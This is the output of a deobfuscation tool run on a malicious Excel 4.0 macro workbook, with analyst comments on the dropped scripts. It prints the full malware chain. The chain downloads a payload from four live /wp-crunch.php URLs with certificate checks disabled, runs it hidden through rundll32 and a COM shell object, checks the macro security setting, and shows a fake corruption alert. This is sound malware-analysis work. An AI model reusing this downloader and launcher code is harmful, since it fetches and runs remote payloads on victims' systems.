  279. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  280. CELL:BJ56404 , FullEvaluation , [FALSE]
  281. CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  282. CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  283. CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  284. CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
  285. CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
  286. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  287. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  288. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  289. CELL:BJ56396 , FullEvaluation , [FALSE]
  290. CELL:BJ56397 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  291. CELL:BJ56398 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  292. CELL:BJ56399 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  293. CELL:BJ56400 , FullEvaluation , IF(R56398C62<40000,,GOTO(R56411C62))
  294. CELL:BJ56401 , FullEvaluation , "https://gurukal.in/wp-crunch.php"
  295. CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  296. CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  297. CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
  298. CELL:BJ56404 , FullEvaluation , [FALSE]
  299. CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  300. CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  301. CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  302. CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
  303. CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
  304. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  305. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  306. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  307. CELL:FL18287 , FullEvaluation , [FALSE] GOTO(R23779C121)
  308. CELL:DQ23779 , FullEvaluation , "=""C:\Users\Public\mWwd6De.html"""
  309. CELL:DQ23780 , FullEvaluation , "=""C:\Users\Public\M737Q.vbs"""
  310. CELL:DQ23781 , FullEvaluation , "=FOPEN(R45257C10,3)"
  311. CELL:DQ23782 , FullEvaluation , "=FWRITELN(R45258C10,""hquS = """"https://estudiolacazezancarini.com/wp-crunch.php"""""")"
  312. CELL:DQ23783 , FullEvaluation , "=FWRITELN(R45258C10,""fpiT = """"https://germdisruptor.com/wp-crunch.php"""""")"
  313. CELL:DQ23784 , FullEvaluation , "=FWRITELN(R45258C10,""fSRoqzx = """"https://gurukal.in/wp-crunch.php"""""")"
  314. CELL:DQ23785 , FullEvaluation , "=FWRITELN(R45258C10,""jP5 = """"https://indoeducation.com/wp-crunch.php"""""")"
  315. CELL:DQ23786 , FullEvaluation , "=FWRITELN(R45258C10,""hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)"")"
  316. CELL:DQ23787 , FullEvaluation , "=FWRITELN(R45258C10,""Dim kNV: Set kNV = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  317. CELL:DQ23788 , FullEvaluation , "=FWRITELN(R45258C10,""Function eHMCbJ(data):"")"
  318. CELL:DQ23789 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.setOption(2) = 13056"")"
  319. CELL:DQ23790 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.Open """"GET"""", data, False"")"
  320. CELL:DQ23791 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  321. CELL:DQ23792 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.Send"")"
  322. CELL:DQ23793 , FullEvaluation , "=FWRITELN(R45258C10,""eHMCbJ = kNV.Status"")"
  323. CELL:DQ23794 , FullEvaluation , "=FWRITELN(R45258C10,""End Function"")"
  324. CELL:DQ23795 , FullEvaluation , "=FWRITELN(R45258C10,""For Each qXtq in hoxLrA"")"
  325. CELL:DQ23796 , FullEvaluation , "=FWRITELN(R45258C10,""If eHMCbJ(qXtq) = 200 Then"")"
  326. CELL:DQ23797 , FullEvaluation , "=FWRITELN(R45258C10,""Dim woOQbQ0: Set woOQbQ0 = CreateObject(""""ADODB.Stream"""")"")"
  327. CELL:DQ23798 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Open"")"
  328. CELL:DQ23799 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Type = 1"")"
  329. CELL:DQ23800 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Write kNV.ResponseBody"")"
  330. CELL:DQ23801 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.SaveToFile """"""&R45256C10&"""""", 2"")"
  331. CELL:DQ23802 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Close"")"
  332. CELL:DQ23803 , FullEvaluation , "=FWRITELN(R45258C10,""Exit For"")"
  333. CELL:DQ23804 , FullEvaluation , "=FWRITELN(R45258C10,""End If"")"
  334. CELL:DQ23805 , FullEvaluation , "=FWRITELN(R45258C10,""Next"")"
  335. CELL:DQ23806 , FullEvaluation , "=FCLOSE(R45258C10)"
  336. CELL:DQ23807 , FullEvaluation , "=EXEC(""explorer.exe ""&R45257C10&"""")"
  337. CELL:DQ23808 , FullEvaluation , "=WHILE(ISERROR(FILES(R45256C10)))"
  338. CELL:DQ23809 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  339. CELL:DQ23810 , FullEvaluation , "=NEXT()"
  340. CELL:DQ23811 , FullEvaluation , "=FILE.DELETE(R45257C10)"
  341. CELL:DQ23812 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  342. CELL:DQ23813 , FullEvaluation , "=""C:\Users\Public\Bmk.vbs"""
  343. CELL:DQ23814 , FullEvaluation , "=FOPEN(R45290C10,3)"
  344. CELL:DQ23815 , FullEvaluation , "=""rundll32.exe"""
  345. CELL:DQ23816 , FullEvaluation , "=R45256C10&"",DllRegisterServer"""
  346. CELL:DQ23817 , FullEvaluation , "=""C:\Windows\System32"""
  347. CELL:DQ23818 , FullEvaluation , "=FWRITELN(R45291C10,""Set RSHCGfB5 = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  348. CELL:DQ23819 , FullEvaluation , "=FWRITELN(R45291C10,""RSHCGfB5.Document.Application.ShellExecute """"""&R45292C10&"""""",""""""&R45293C10&"""""",""""""&R45294C10&"""""",Null,0"")"
  349. CELL:DQ23820 , FullEvaluation , "=FCLOSE(R45291C10)"
  350. CELL:DQ23821 , FullEvaluation , "=EXEC(""explorer.exe ""&R45290C10&"""")"
  351. CELL:DQ23822 , FullEvaluation , "=GOTO(R18256C168)"
  352. CELL:DQ23823 , FullEvaluation , ON.TIME(2020-06-26 11:40:53.355704,'VyNand2egLwRTDtMIW'!AV40173)
  353. CELL:AV40173 , FullEvaluation , FORMULA("=FORMULA(R[-16395]C[73],R[5082]C[-38])",VyNand2egLwRTDtMIW$AV$40174:$AV$40217)
  354. CELL:AV40174 , FullEvaluation , FORMULA("=""C:\Users\Public\mWwd6De.html""",R[5082]C[-38])
  355. CELL:AV40175 , FullEvaluation , FORMULA("=""C:\Users\Public\M737Q.vbs""",R[5082]C[-38])
  356. CELL:AV40176 , FullEvaluation , FORMULA("=FOPEN(R45257C10,3)",R[5082]C[-38])
  357. CELL:AV40177 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""hquS = """"https://estudiolacazezancarini.com/wp-crunch.php"""""")",R[5082]C[-38])
  358. CELL:AV40178 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""fpiT = """"https://germdisruptor.com/wp-crunch.php"""""")",R[5082]C[-38])
  359. CELL:AV40179 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""fSRoqzx = """"https://gurukal.in/wp-crunch.php"""""")",R[5082]C[-38])
  360. CELL:AV40180 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""jP5 = """"https://indoeducation.com/wp-crunch.php"""""")",R[5082]C[-38])
  361. CELL:AV40181 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)"")",R[5082]C[-38])
  362. CELL:AV40182 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Dim kNV: Set kNV = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[5082]C[-38])
  363. CELL:AV40183 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Function eHMCbJ(data):"")",R[5082]C[-38])
  364. CELL:AV40184 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.setOption(2) = 13056"")",R[5082]C[-38])
  365. CELL:AV40185 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.Open """"GET"""", data, False"")",R[5082]C[-38])
  366. CELL:AV40186 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[5082]C[-38])
  367. CELL:AV40187 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.Send"")",R[5082]C[-38])
  368. CELL:AV40188 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""eHMCbJ = kNV.Status"")",R[5082]C[-38])
  369. CELL:AV40189 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""End Function"")",R[5082]C[-38])
  370. CELL:AV40190 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""For Each qXtq in hoxLrA"")",R[5082]C[-38])
  371. CELL:AV40191 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""If eHMCbJ(qXtq) = 200 Then"")",R[5082]C[-38])
  372. CELL:AV40192 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Dim woOQbQ0: Set woOQbQ0 = CreateObject(""""ADODB.Stream"""")"")",R[5082]C[-38])
  373. CELL:AV40193 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Open"")",R[5082]C[-38])
  374. CELL:AV40194 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Type = 1"")",R[5082]C[-38])
  375. CELL:AV40195 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Write kNV.ResponseBody"")",R[5082]C[-38])
  376. CELL:AV40196 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.SaveToFile """"""&R45256C10&"""""", 2"")",R[5082]C[-38])
  377. CELL:AV40197 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Close"")",R[5082]C[-38])
  378. CELL:AV40198 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Exit For"")",R[5082]C[-38])
  379. CELL:AV40199 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""End If"")",R[5082]C[-38])
  380. CELL:AV40200 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Next"")",R[5082]C[-38])
  381. CELL:AV40201 , FullEvaluation , FORMULA("=FCLOSE(R45258C10)",R[5082]C[-38])
  382. CELL:AV40202 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R45257C10&"""")",R[5082]C[-38])
  383. CELL:AV40203 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R45256C10)))",R[5082]C[-38])
  384. CELL:AV40204 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[5082]C[-38])
  385. CELL:AV40205 , FullEvaluation , FORMULA("=NEXT()",R[5082]C[-38])
  386. CELL:AV40206 , FullEvaluation , FORMULA("=FILE.DELETE(R45257C10)",R[5082]C[-38])
  387. CELL:AV40207 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[5082]C[-38])
  388. CELL:AV40208 , FullEvaluation , FORMULA("=""C:\Users\Public\Bmk.vbs""",R[5082]C[-38])
  389. CELL:AV40209 , FullEvaluation , FORMULA("=FOPEN(R45290C10,3)",R[5082]C[-38])
  390. CELL:AV40210 , FullEvaluation , FORMULA("=""rundll32.exe""",R[5082]C[-38])
  391. CELL:AV40211 , FullEvaluation , FORMULA("=R45256C10&"",DllRegisterServer""",R[5082]C[-38])
  392. CELL:AV40212 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[5082]C[-38])
  393. CELL:AV40213 , FullEvaluation , FORMULA("=FWRITELN(R45291C10,""Set RSHCGfB5 = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[5082]C[-38])
  394. CELL:AV40214 , FullEvaluation , FORMULA("=FWRITELN(R45291C10,""RSHCGfB5.Document.Application.ShellExecute """"""&R45292C10&"""""",""""""&R45293C10&"""""",""""""&R45294C10&"""""",Null,0"")",R[5082]C[-38])
  395. CELL:AV40215 , FullEvaluation , FORMULA("=FCLOSE(R45291C10)",R[5082]C[-38])
  396. CELL:AV40216 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R45290C10&"""")",R[5082]C[-38])
  397. CELL:AV40217 , FullEvaluation , FORMULA("=GOTO(R18256C168)",R[5082]C[-38])
  398. CELL:AV40218 , FullEvaluation , ON.TIME(2020-06-26 11:40:53.394678,'VyNand2egLwRTDtMIW'!J45256)
  399. CELL:J45256 , FullEvaluation , "C:\Users\Public\mWwd6De.html"
  400. CELL:J45257 , FullEvaluation , "C:\Users\Public\M737Q.vbs"
  401. CELL:J45258 , FullEvaluation , FOPEN("C:\Users\Public\M737Q.vbs",3)
  402. CELL:J45259 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","hquS = ""https://estudiolacazezancarini.com/wp-crunch.php""")
  403. CELL:J45260 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","fpiT = ""https://germdisruptor.com/wp-crunch.php""")
  404. CELL:J45261 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","fSRoqzx = ""https://gurukal.in/wp-crunch.php""")
  405. CELL:J45262 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","jP5 = ""https://indoeducation.com/wp-crunch.php""")
  406. CELL:J45263 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)")
  407. CELL:J45264 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Dim kNV: Set kNV = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
  408. CELL:J45265 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Function eHMCbJ(data):")
  409. CELL:J45266 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.setOption(2) = 13056")
  410. CELL:J45267 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.Open ""GET"", data, False")
  411. CELL:J45268 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
  412. CELL:J45269 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.Send")
  413. CELL:J45270 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","eHMCbJ = kNV.Status")
  414. CELL:J45271 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","End Function")
  415. CELL:J45272 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","For Each qXtq in hoxLrA")
  416. CELL:J45273 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","If eHMCbJ(qXtq) = 200 Then")
  417. CELL:J45274 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Dim woOQbQ0: Set woOQbQ0 = CreateObject(""ADODB.Stream"")")
  418. CELL:J45275 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Open")
  419. CELL:J45276 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Type = 1")
  420. CELL:J45277 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Write kNV.ResponseBody")
  421. CELL:J45278 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.SaveToFile ""C:\Users\Public\mWwd6De.html"", 2")
  422. CELL:J45279 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Close")
  423. CELL:J45280 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Exit For")
  424. CELL:J45281 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","End If")
  425. CELL:J45282 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Next")
  426. CELL:J45283 , PartialEvaluation , FCLOSE("C:\Users\Public\M737Q.vbs")
  427. CELL:J45284 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\M737Q.vbs")
  428. CELL:J45285 , PartialEvaluation , WHILE(ISERROR(FILES(R45256C10)))
  429. CELL:J45288 , PartialEvaluation , FILE.DELETE("C:\Users\Public\M737Q.vbs")
  430. CELL:J45289 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
  431. CELL:J45290 , FullEvaluation , "C:\Users\Public\Bmk.vbs"
  432. CELL:J45291 , FullEvaluation , FOPEN("C:\Users\Public\Bmk.vbs",3)
  433. CELL:J45292 , FullEvaluation , "rundll32.exe"
  434. CELL:J45293 , FullEvaluation , "C:\Users\Public\mWwd6De.html,DllRegisterServer"
  435. CELL:J45294 , FullEvaluation , "C:\Windows\System32"
  436. CELL:J45295 , FullEvaluation , FWRITE("C:\Users\Public\Bmk.vbs","Set RSHCGfB5 = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
  437. CELL:J45296 , FullEvaluation , FWRITE("C:\Users\Public\Bmk.vbs","RSHCGfB5.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\mWwd6De.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
  438. CELL:J45297 , PartialEvaluation , FCLOSE("C:\Users\Public\Bmk.vbs")
  439. CELL:J45298 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\Bmk.vbs")
  440. CELL:J45299 , FullEvaluation , GOTO(R18256C168)
  441. CELL:FL18256 , End , CLOSE(FALSE)
  442. CELL:FL18266 , FullEvaluation , [FALSE] GOTO(R18256C168)
  443. CELL:FL18256 , End , CLOSE(FALSE)
  444.  
  445. Files:
  446.  
  447. Files: path C:\Users\Public\qyUV.vbs, access 3
  ' Analyst note: reconstructed content of the dropped file C:\Users\Public\qyUV.vbs.
  ' It reads one registry value and writes it to a text file; nothing here modifies the registry.
  ' On Error Resume Next means a failed read (e.g. missing value) is skipped silently.
  448. On Error Resume Next
  449. Set VFYjmh = CreateObject("WScript.Shell")
  450. Set Yt1jI = CreateObject("Scripting.FileSystemObject")
  ' Analyst note: the second argument True overwrites an existing gzGD.txt.
  451. Set BIj = Yt1jI.CreateTextFile("C:\Users\Public\gzGD.txt", True)
  ' Analyst note: "GET.WORKSPACE(2)" is an XLM call the deobfuscator left unevaluated inside the
  ' string; in Excel it returns the application version, so the key actually read is
  ' ...\Office\<version>\Excel\Security\VBAWarnings (the macro security setting).
  ' Presumably an environment/sandbox check - how the macro uses the value is not shown in this
  ' part of the log; confirm against the cells that read gzGD.txt.
  452. BIj.WriteLine(VFYjmh.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings"))
  453. BIj.Close
  454.  
  455.  
  456. Files: path C:\Users\Public\M737Q.vbs, access 3
  ' Analyst note: reconstructed content of the dropped file C:\Users\Public\M737Q.vbs (downloader).
  ' It tries four URLs in order and saves the body of the first HTTP 200 response to disk.
  ' All four URLs share the path /wp-crunch.php, which is usable as a proxy-log hunting pattern.
  457. hquS = "https://estudiolacazezancarini.com/wp-crunch.php"
  458. fpiT = "https://germdisruptor.com/wp-crunch.php"
  459. fSRoqzx = "https://gurukal.in/wp-crunch.php"
  460. jP5 = "https://indoeducation.com/wp-crunch.php"
  461. hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)
  ' Analyst note: kNV is script-level, so the response of the last request stays available
  ' after eHMCbJ returns.
  462. Dim kNV: Set kNV = CreateObject("MSXML2.ServerXMLHTTP.6.0")
  ' Analyst note: eHMCbJ(data) issues a synchronous GET to the URL in data and returns the HTTP status.
  463. Function eHMCbJ(data):
  ' Analyst note: option 2 is SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS and 13056 (0x3300)
  ' ignores all server certificate errors, i.e. TLS certificate validation is disabled.
  464. kNV.setOption(2) = 13056
  465. kNV.Open "GET", data, False
  ' Analyst note: fixed legacy User-Agent (MSIE 6.0 / Windows NT 5.0); a network detection signal.
  466. kNV.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  467. kNV.Send
  468. eHMCbJ = kNV.Status
  469. End Function
  470. For Each qXtq in hoxLrA
  471. If eHMCbJ(qXtq) = 200 Then
  472. Dim woOQbQ0: Set woOQbQ0 = CreateObject("ADODB.Stream")
  473. woOQbQ0.Open
  ' Analyst note: Type = 1 selects binary mode, so the response bytes are written unmodified.
  474. woOQbQ0.Type = 1
  475. woOQbQ0.Write kNV.ResponseBody
  ' Analyst note: save option 2 overwrites an existing file. The .html name does not describe the
  ' content: the Bmk.vbs dump in this log passes this path to rundll32 with DllRegisterServer,
  ' so the download is expected to be a DLL.
  476. woOQbQ0.SaveToFile "C:\Users\Public\mWwd6De.html", 2
  477. woOQbQ0.Close
  ' Analyst note: stops at the first URL that answered 200; the remaining URLs are fallbacks.
  478. Exit For
  479. End If
  480. Next
  481.  
  482.  
  483. Files: path C:\Users\Public\Bmk.vbs, access 3
  ' Analyst note: reconstructed content of the dropped file C:\Users\Public\Bmk.vbs (launcher).
  ' CLSID C08AFD90-F2A1-11D1-8455-00A0C91F3880 is the ShellBrowserWindow COM class; the process is
  ' started through the shell's automation object rather than directly by the script host.
  ' Presumably rundll32.exe then appears as a child of explorer.exe - verify in process telemetry.
  484. Set RSHCGfB5 = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
  ' Analyst note: ShellExecute arguments are file, arguments, working directory, verb, window style.
  ' Window style 0 hides the window. Detection signal: rundll32.exe loading a non-.dll file from
  ' C:\Users\Public with the DllRegisterServer export.
  485. RSHCGfB5.Document.Application.ShellExecute "rundll32.exe","C:\Users\Public\mWwd6De.html,DllRegisterServer","C:\Windows\System32",Null,0
  486.  
  487.  
  488. [END of Deobfuscation]
  489. time elapsed: 5.384254693984985
  490.  
  491. Process finished with exit code 0